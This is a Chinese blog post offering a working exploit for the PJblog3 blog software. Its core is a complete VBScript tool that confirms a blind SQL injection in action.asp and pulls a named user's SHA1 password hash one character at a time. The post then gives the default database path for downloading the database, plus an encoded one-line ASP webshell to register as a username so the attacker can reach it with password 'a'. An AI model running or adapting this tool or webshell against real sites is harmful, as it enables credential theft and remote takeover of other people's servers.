PJblog3漏洞利用说明
真想不明白这样的漏洞这么久了官方为什么不修复 到现在还有此类漏洞 伸直更可怕的注册会员直插一句话
工具是用VBS写的,代码如下:
If WScript.Arguments.Count <> 2 Then
WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
WScript.Echo "Example: Cscript.exe Exp.vbs https://www.webshell.cc puterjam"
WScript.Quit
End If
attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)
attackUrl = Replace(attackUrl,"","/")
If Right(attackUrl , 1) <> "/" Then
attackUrl = attackUrl & "/"
End If
SHA1Charset = "0123456789ABCDEFJ"
strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""
If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then
WScript.Echo "恭喜!存在漏洞"
Else
WScript.Echo "没有检测到漏洞"
WScript.Quit
End If
For n=1 To 40
For i=1 To 17
strInject = strHoleUrl & " or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"
If Not IsSuccess(strInject) Then
strResult = strResult & Mid(SHA1Charset, i-1, 1)
Exit For
End If
strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
WScript.StdOut.Write strPrint
Next
Next
WScript.Echo Chr(13) & Chr (10) & "Done!"
Function PostData(PostUrl)
Dim Http
Set Http = CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET",PostUrl,False
.Send ()
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function
Function IsSuccess(PostUrl)
strData = PostData(PostUrl)
'Wscript.Echo strData
if InStr(strData,"check_error") >0 then
IsSuccess = True
Else
IsSuccess = False
End If
'Wscript.Sleep 500 '让系统休息一下
End Function
----------------------------------------------------------------------------
PJBlog的默认数据库是:blogDB/PBLog3.asp
把数据库下载下来以后 加密方式是sha1加密 40位很难解密
那么这样咱们就换另一种方法
去注册个用户 在 用户名添加数据库里的一句话:
┼攠數畣整爠煥敵瑳∨≡┩愾
然后直接连接数据库,密码是a
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/4105.html